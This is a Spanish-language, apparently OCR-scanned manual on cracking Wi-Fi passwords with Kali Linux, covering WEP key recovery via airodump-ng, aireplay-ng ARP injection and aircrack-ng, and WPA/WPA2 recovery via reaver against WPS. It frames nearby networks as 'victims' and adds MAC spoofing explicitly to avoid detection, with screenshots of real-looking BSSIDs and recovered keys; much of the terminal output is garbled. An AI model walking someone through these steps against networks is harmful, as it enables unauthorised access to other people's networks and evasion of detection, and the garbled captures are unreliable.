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Introduccion 


Kali Linux es un Sistema Operativo creado especialmente para usuarios expertos en 
seguridad informatica. Contiene innumerables cantidad de herramientas de analisis de 
redes y es capaz (Con una configuracion adecuada) realizar gran cantidad de pruebas de 
penetracion y manipulacion de datos protegidos que estan en un ordenador remoto. 


En este manual nos vamos a centrar en como obtener esta herramienta y de que forma 
utilizarla para descifrar claves Wifi (Seguridad: Wep, Wpa, Wpa2). En proximos manuales 
vamos a analizar mas a fondo todas las cuestiones que tienen que ver con la creacion de 
Payload, la explotacion de vulnerabilidades, y la correcta incursion a un equipo remoto 
iniclando sesiones entre la maquina atacante y la victima tanto en redes LAN como en 
WAN. 


Es importante mencionar que los usuarios poco relacionados al mundo de la informatica 
confian excesivamente en los antivirus, lo cual es un error grave, Kali linux puede generar 
ataque de antivirus bypass lo que genera un salteo de la seguridad del antivirus y del 
firewall instalados en la pc. Interiorizarnos en el mundo de la seguridad informatica puede 
darnos herramientas orientativas de la utilizacion de los equipos informaticos analizando 
riesgos de utilizacion y pudiendo prever futuros ataques a nuestras redes que pueden 
comprometer en mayor o menor medida la informacion que tengamos almacenada, asi 
también las contrasenas de nuestras redes sociales y bancarias. 


Una vez mencionado todo esto nos ponemos a trabajar para aprender en detalle como 
descifrar claves Wifi. 
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Descarga y preparacion de un Pendrive para Kali Linux 


Para realizar esta tarea compile una serie de programas portables de manera tal que 
opuedan encontrar todo lo que necesitan en una sola aplicacion y de esta forma realizar 
este proceso de manera mas sencilla aparte esta acompanado con un video tutorial 
subido en Youtube en el cual se detallan los pasos a seguir para conseguir el objetivo 
deseado 
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llustracion 2 


Video tutorial de descarga y creacion de un pendrive booteable con Kali Linux 
https://www.youtube.com/watch ?v=8g Yv-f2U08c 
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Descifrado de claves seguridad WEP 


Una vez que tengamos el pendrive preparado y hayamos booteado correctamente el 
sistema operativo kali linux ya podemos realizar el proceso de descifrado de claves wifi en 
este caso de seguridad WEP. 


Abrimos un terminal nuevo e introducimos el comando airmon-ng 


= 
File Edit View Search Terminal Help 
# ailrmon-ng 


Interface Chipset Driver 


¥LanO Atheros AR9285 ath9k - [phy0O] 


#7 





llustracion 3 


Nos aparecera un listado con las placas inalambricas que tengamos en el ordenador en 
este caso una sola WLANO. 


Luego de esto tenemos que poner la placa de red que hayamos elegido en modo monitor 
para esto tecleamos los comandos. 


e ifconfig wlan0 down 

e iwconfig wlan0 mode monitor 
e ifconfig wlan0O up 

e airmon-ng start wlan0 


i a — Oo ole let ele Mit— mot — 6 on na or) LO) 


Found Pie on ool ot —)—t—1 —)—_ ee ot ot ono] © Mc Mot — 1 6 t—i — tis ol gol 6 om a — ae 
i er  elole (Ol lolol ale mr — = i al —l ol —h aot ale Mol ellt— = ii eu Sl elt ale Mi —m slo] ol_mmk \ lol al asl ale Mit bm o_o a 
(ol — 8 am Molo Mil oly aie ois M1) (Seen ao) © ME Bae | 0s Os ol oS es OQ — od — ee os Ds od 0 


LS 


ie hom al a t—lel—lel—aa 
OY) of ie lel ol as met—laks 


2 oho — 8 on on — (Si a 8 oli —& Driver 


iwlanoO Atheros AR9S285 hl b>) ee oleh ACM | 
('@iiteolam men eli lolel—mm—! al—l ol G—le Mol em ile!aloD) 





llustracion 4 
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Ya esta en modo monitor. 


A continuacion vamos a cambiar nuestra direccion MAC por una ficticia para enganar a la 
victima y que sea mas dificil ser detectados. 


Para esto tecleamos el comando ifconfig mon0 down 


-~# ifconfig monO down 


~# | 





llustracion 5 


Luego el comando macchange --mac 00:11:22:33:44:55 


-~# macchanger --mac 00:11:22:33:44:55 
GNU MAC Changer 





llustracion 6 


Una vez hecho esto el comando ifconfig monO up 


-~# ifconfig monO up 





llustracion 7 


Ya tenemos la placa de red WlanO en modo monitor, y ya cambiamos nuestra direccion 
mac por una ficticia, lo que nos toca hacer ahora es comenzar a captar las senales Wifi 
que tengamos cerca de nuestra localizacion, para esto utilizamos el comando 


airodump-ng mon0O 
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File Edit View Search Terminal Help 
:-~# airodump-ng mono 





root@kali: ~ 


File Edit View Search Terminal Help 
]{ 2014-01-18 00:44 
si—t- Lone) al #Data, #F#/s CH (On od a | od ee Oe Oe ee oe 
0) 11 : WEP Speedy_yyiokp 
10 11 WEP mirko-wifi 


1) 1 CCMP PSK 595d 
1) 2 TKIP a) Oe =i =O] =) 


STATION PWR Rate Frames aaa ae) ol — 


64:70:02:0A:EB:72 -61 0 -54e 27 
F4:CE:46:90:69:AE a 36e-54e 10) 





En la tabla figuran los datos de las posibles victimas: 


e BSSID: Es la direccion MAC de la victima 

e PWR: Es la cantidad de senal que nos llega de esa red 
e CH: Es el canal por el cual esta trasmitiendo la senal 

e ENC: Es la seguridad de encriptacion de paquetes 

e ESSID: el nombre de la red inalambrica 


Tenemos que seleccionar una red para descifrar en este caso elegiremos la primera de 
ellas. 


root@kali: ~ 


File Edit View Search Termina L Help 


1 eo i eos es Bh - ol ome 


=i—t- [one] al) #Data, #/s CH CIPHER AUTH ESSID 


24 1) 0) 11 : WEP Speedy_yyiokp 
16 50 nO) 11 WEP mirko-wifi 
-84 14 19) 0 1 : CCMP PSK 595d 
-83 18 r 0 2 : TKIP PSK EEOB 


STATION PWR Rate Frames =a ae) ol — 


64:70:02:0A:EB:72 -61 0 -54e 27 
F4:CE:46:90:69:AE -73 36e -54e 10) 
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Una vez elegida presionamos CTRL+C para detener la busqueda. 

Acto seguido tecleamos el siguiente comando 

airodump-ng -c (Canal de la victima) -w WEP --bssid (La mac victima) mon0O 
-c: 11 En este caso 

--bssid: 50:67:F0:9D:8B:83 


-w: Crea un archivo donde se va a guardar toda la informacion en este caso se llama 
WEP pero pongale el nombre que quiera. 


root@kKall: ~ 


File Edit View Search Terminal Help 


CH 11 ][ Elapsed: 24 s ][ 2014-01-18 00:44 


BSSID PWR Beacons #Data, #/s MB ENC CIPHER AUTH ESSID 
50:67:F0:9D:8B: 83 ise) 54 . WEP WEP Speedy_yyiokp 
F8:03:8E:9F :53:F5_.<“7/ 59 54e WEP WEP mirko-wifil 
4C:1F:CC:E0:59:66 -84 9) 54e. WPA2 CCMP PSK 595d 

310 al oO] oO] Oe ol oi oho) 8 54e. WPA’ TKIP see) Qe =f =O) 5) 

BSSID STATION Rate Lost Frames Probe 


F8:03:8E:9F:53:F5 64:70:02:0A:EB:72 -62 0 -48e 173 41 
F8:03:8E:9F:53:F5 F4:CE:46:90:69:AE -77 36e-.1 0 31 


:~# alrodump-ng -c 11 -w WEP --bssid 50:67:F0:9D:8B:83 Teyal®) 





llustracion 11 


Damos enter 


File Edit View Search Terminal Help 
CH 11 ][ Elapsed: 12 s ][ 2014-01-18 00:47 
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


50:67:F0:9D:8B:83 -51 100 143 6 |. WEP WEP Speedy_yyiokp 


BSSID STATION PWR Rate elas Frames Probe 





llustracion 12 


Y comienza a capturar paquetes de esa red para poder descifrar la contrasena. 
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Ahora bien, ya teniendo todo esto podriamos esperar que junte 30000 #data y ya 
tendriamos la contrasena. De eso se trata esto que Ilegue a los 30000 paquetes o mas y 
poder lograr el objetivo. Pero este proceso tardaria mucho tiempo asi que lo que vamos 
hacer a continuacion es abrir un nuevo terminal sin cerrar el que esta abierto y teclear el 
comando aireplay-ng -1 0 -a (La mac victima) monO 

-~# aireplay-ng -1 0 -a 50:67:F0:9D:8B:83 mono 


oo] 0 8 ot — mn V1 Ole Gel a D J ol lots By as Ale I © fe Bs ol | So | 8s od 0 Oe 1 OG) | CT - ee A | oe 
oe Do eo) On | (ies ole Ms ol oll 1 —t—-lole] a Mh at at —1 1/12 @ =} )- 0 Do) O Dl Ad oO] DE =] = 2 0 eo) o of a t—1 a] 0 | ee 


7:49:50 Sending Authentication Request (Open System) [ACK] 


:49:50 Authentication successful 
:49:50 Sending Association Request [ACK] 
7:49:50 |. ¥——lol om Bh as Reo) o Wt) © (of of —1— 1 © ee De 


a 





llustracion 13 


Ahora abrimos un tercer terminal (sin cerrar los otros 2) y tecleamos el comando 


aireplay-ng -3 -b (Mac victima) monO 


rooug@kKall: ~ 


File Edit View Search Terminal Help 
:~# alreplay-ng -3 -b 50:67:F0:9D:8B:83 mon0O [| 
o source MAC (-h) specified. Using the device MAC (C0:CN:38:71:3E:72) 


D0:51:45 Waiting for beacon frame (BSSID: 50:67:F0:9D:8B:83) on channel 11 
Saving ARP requests in replay_arp-0118-005145.cap 

ou should also start airodump-ng to capture replies. 

ead 1488 packets (got 0 ARP requests and 0 ACKs), sent O packets...(0 pps) 





llustracion 14 


De esta forma vamos a comenzar a inyectar paquetes ARP para estimular el pasaje de 
informacion (Data a nuestro Router). 


Es importante mencionar que mientras mas la victima este utilizando internet mas rapido 
va a ser el proceso, es por eso que deben tener paciencia y esperar un poco en esta 
parte. El tiempo va a depender enteramente en el uso que la victima le esta dando a su 
conexion de internet. El proceso puede variar entre 5 a 40 minutos. 


Una vez alcanzado los 30000 de Data como se muestra en la imagen siguiente: 
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root@kali: ~ 


File Edit View Search Terminal Help 
CH 11 ][ Elapsed: 11 mins ][ 2014-01-18 00:58 


BSSID PWR RXQ Beacons #Data,§#/s CH MB ENC CIPHER AUTH ESSID 


50:67:F0:9D:8B:83 -60 100 6420 78888 #833 11 54 . WEP WEP OPN Speedy _yyiokp 


BSSID STATION pada RAte Lost Frames Probe 


50:67:F0:9D:8B:83 C0:CB:38:71:3E:72 0-1 £82533 92379 
0] Oo Ae ol OR~] B=] = t= A 0 t= 0 dl OW A od D OY 48 -18 6) oh Noy ms) ol -1-1e hE Re) 40) 
50:67:F0:9D:8B:83 40:7A:80:C7:FD:C4_ - 54 -18 6) 52990 Speedy _yyiokp 





llustracion 15 


Como pueden observar yo junte mucho mas de 30000 mientras mas junten mejor, lo 
minimo es 30000. 


A continuacion abrimos una nueva terminal (Sin cerrar las anteriores) y vamos a teclear el 
siguiente comando 


aircrack-ng WEP-01.cap 


File Edit View Search Terminal Help 


'~-# alrcrack-ng WEP -O1.capiq 





llustracion 16 


Presionamos enter 
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root@kali: ~ 
File Edit View Search Terminal Help 
:-~# aircrack-ng WEP-O1l.cap 
Opening WEP-O1l1.cap 
X—¥-[e Mo] 010] 0 lo ic Mm of-lol 4-ha_ mm 


# BSSID ESSID Encryption 


io] Ol © Ard ol OB~ | DR =] = Bt - 1 ol -1-1o ha eld 0) WEP (128364 IVs) 


network as target. 


mor] 0) 
restarted every 5000 captured ivs. 
Starting PTW attack with 128868 ivs. 
KEY FOUND! [ 77:6E:79:78:62 ] | 
Dom o's oh tle Mol od ol a lon oll Ae BOLO)... 


llustracion 17 





Ya tenemos la clave: 


Lo que tienen que hacer es sacarle los dos puntos a los numeros que aparecen entre 
corchetes , la clave seria esta 776E797862. 


Descifrado de claves WPA-WPA2 


Método de Reaver sin diccionario 


El metodo de Reaver tiene sus virtudes y sus defectos, dependiendo la situacion en la que 
nos encontremos deberemos elegir si usar Reaver o diccionarios. En este manual vamos 
a identificar cuales son los puntos fuertes y debiles de ambos metodos. Vamos a ensenar 
primero Reaver porque el proceso es mas sencillo, pero no se puede utilizar en todos los 
casos debido a que solo funciona con routers que poseen WPS en otros casos no se 
puede utilizar. 


Comencemos, abrimos una terminal y ponemos nuestra placa de red en modo monitor 
como ya hemos visto anteriormente. airmon-ng start wlan0 
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Bienvenido a Kali Linux BTshell 





| Archivo Editar Ve maee 


a ee ey 
--# airmon-nq start wlan@ 


Found 2 processes that could cause trouble. 

lf airodump-ng, aireplay-ng or airtun-ng stops working after 
ia short period of time, you may want to Kill (some of) 
PIC Name 

(2313 NetworkManager 

7466 wpa supplicant 


them! 


Interface Chipset Driver 


wlan Broadcom b4s - [phy] 


(moniter mode enabled on mont) 


llustracion 18 


El segundo comando nos va a decir cuales de las redes que tenemos alcance posee el 
WPS activado. wifite 


Bienvenido a Kali Linux BTs' 


Archive Editar Ver Buscar Terminal AWuda 


| Pi ua 





llustracion 19 


Damos enter y nos aparecera la siguiente lista. 
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Bienvenido a Kali Linux BTshell 


| Archivo Editar Ver Buscar Terminal Ayuda 


targets and |2 clients found 





llustracion 20 


Los que dicen WPS en verde son los que se pueden hackear con Reaver el resto no se va 
a poder con este metodo. 


Lo proximo que tenemos que hacer es teclear el comando para que 
nos aparezca la lista de redes con sus respectivas direcciones Mac y todos los demas 
datos importantes como por ejemplo el canal 
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Bienvenido a Kali Linux BTshell 


| Archivo Editar Ver Buscar Terminal Ayuda 


CH 4 ][ Elapsed: 2? mins ][ 2013-08-25 19:45 


BSSID PWR Beacons #lata, #/s C MB ENC CIPHER AUTH ESSID 


BG: TA: 
ae ame 
Le. £ 


~ 
> 


-] CG) 5 GO 1609 -l WEP WEP <Length: = 

-48 498 G G 54a. WPA2 CCMP PSK MI RED 

-/2 455 G G 54a WPA CCMP PSK vodaTfone5Sl 

“75 34 54a. WPA2 CCMP PSK Orange-50E6 
38 54a WPA CCMP PSK RAUL JAZZ 
Al lie WPA CCMP PSK JAZZTEL 53F1 
1g? 54a WPA CCMP PSK vodaTfoneSDF5 
iis) 54a. WPA2Z CCMP PSK casarocio 
11? 54a WPA CCMP PSK vodafone 28BE 
19 54a WPA? CCMP PSK Jazztel 46 
44 54a WPA CCMP PSK vodafonebl?s 
12 ee | PSK Biblioteca 
inc) WPA CCMP PSK vodaTfoneDBsl 


fa) 
fa) 
J Li 


‘ml a 
Ried 
ok 


ee 


BG :7 
FS :t 
38:/2:C6 
64:16: 


be) esate oy a 


7 On TT] on in 


BC: 
Cé:D 


79. 7A 


=cF 


BATA 


oO BT Wo 
i OO ti) lS Go mm ¢ 
J EF? OO 0 Of J Fre 


7 
- 


| 
mau] 


Ta 
2 OO 
eee 2 


HT 4 : f 

a ‘SK WLAN 4055 

IL IGB LA: OF DSF DAE : : : ) 3 54a ; SK OWLAN & 
64:68:0C:0C:44:¢ € : G <Length: => 
GG:15:6D:1A: fis SZ = 5 : <Length: => 


al 
2 





llustracion 21 


A traves del nombre de la red en este caso WLAN_4D55 que es la que habiamos elegido 
en la ilustracion 20, copiamos su direccion Mac seleccionandola clic derecho copiar. 


Acto seguido abrimos un nuevo terminal y tecleamos el siguiente comando. 


Bienvenido a Kali Linux BTshell 


Archivo Editar Ver Buscar Terminal Ayuda 
‘ootagBbIshell:~ saver -1 mon® -b A4:52:6F:E2:40:56 -vv 





llustracion 22 


Presionamos enter y esperamos a que aparezca lo que esta en la ilustracion 23 en la 
misma ya se obtuvo la contrasena deseada. 
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Waiting for beacon from A4:52:6F :E2:40:56 

Switching mon@ to channel 1 

Associated with A4:s2:6F:62:4D:56 (ESSID: WLAN 4D55) 

Trying pin 13409/08 

Sending EAPOL START request 

Received identity request 

sending identity response 

Received Ml message 

sending M2 message 

Received M3 message 

sending M4 message 

Received M5 message 

sending Mo message 

Received M/ message 

sending WsC NACK 

Sending WSC NACK 

Pin cracked in 5 secends 

WPS PIN: '13409708 '“<= 

WPA PSK: 'LOWygt@rwTSMsajyyLPL' 

AP SSID: ‘WLAN 4D55' 

Nothing done, nothing to save. 
root@BI sheLl:~# 





Y con esto damos por finalizado el descifrado de claves woa wpa2 con el metodo de 
Reaver. Existe otro metodo que es el diccionarios pero este lo vamos a ver mas adelante 
por el momento el contenido de este manual. 
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